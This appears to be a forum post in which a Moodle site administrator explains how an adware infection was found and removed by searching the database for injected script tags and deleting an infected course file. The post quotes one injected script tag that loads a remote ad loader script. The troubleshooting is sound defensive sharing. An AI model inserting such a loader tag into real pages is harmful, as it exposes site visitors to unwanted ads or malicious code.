Solution worms infect site

Solution worms infect site

by Lázaro José Carneiro de Sousa -
Number of replies: 0

Hello, I am grateful for your attention and especially Eduardo Kraus, who was willing to help me find where the problem was accessing my server and showing me where correct, elaborated below a step by step to fix the same. 

As shown in the image below: one of the courses were presenting blocks of advertisements everywhere, the same did not apply to others. 

Without knowing the solution, googled here and had not shared anything about this case, but however due to experience all that here mentioned their opinions we have solved the problem 

The paths taken for the solution to access the database and find the scripts running, as follows, as mentioned by the collaborators Eduardo Kraus , Gisele Brugger ,Raquel P. Sexton

Access PHPMyAdmin your server, login to your database and click search. (See the sequence below): 

If a result is not 0 appears, consider that there may be a virus. 

In my database, was found as the search <script some inputs: 

"<script src =" http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862 "

type = "text / javascript"> </ script> "

But even erasing all is noticed that some of the advertisements of the plague blocks side but the header and footer remain. 

Thus, in my database I located six entries and the same coming from a single direction, but even editing the database was still getting dirt, the solution was to locate within the course and delete the infected file there which came with descriptions of scripts, is the solution found by collaborator Edward Kraus, which I am grateful.  

I hope the above description serves as a solution to other desperate administrators like me who did not know about the problem it solves.

Average of ratings: -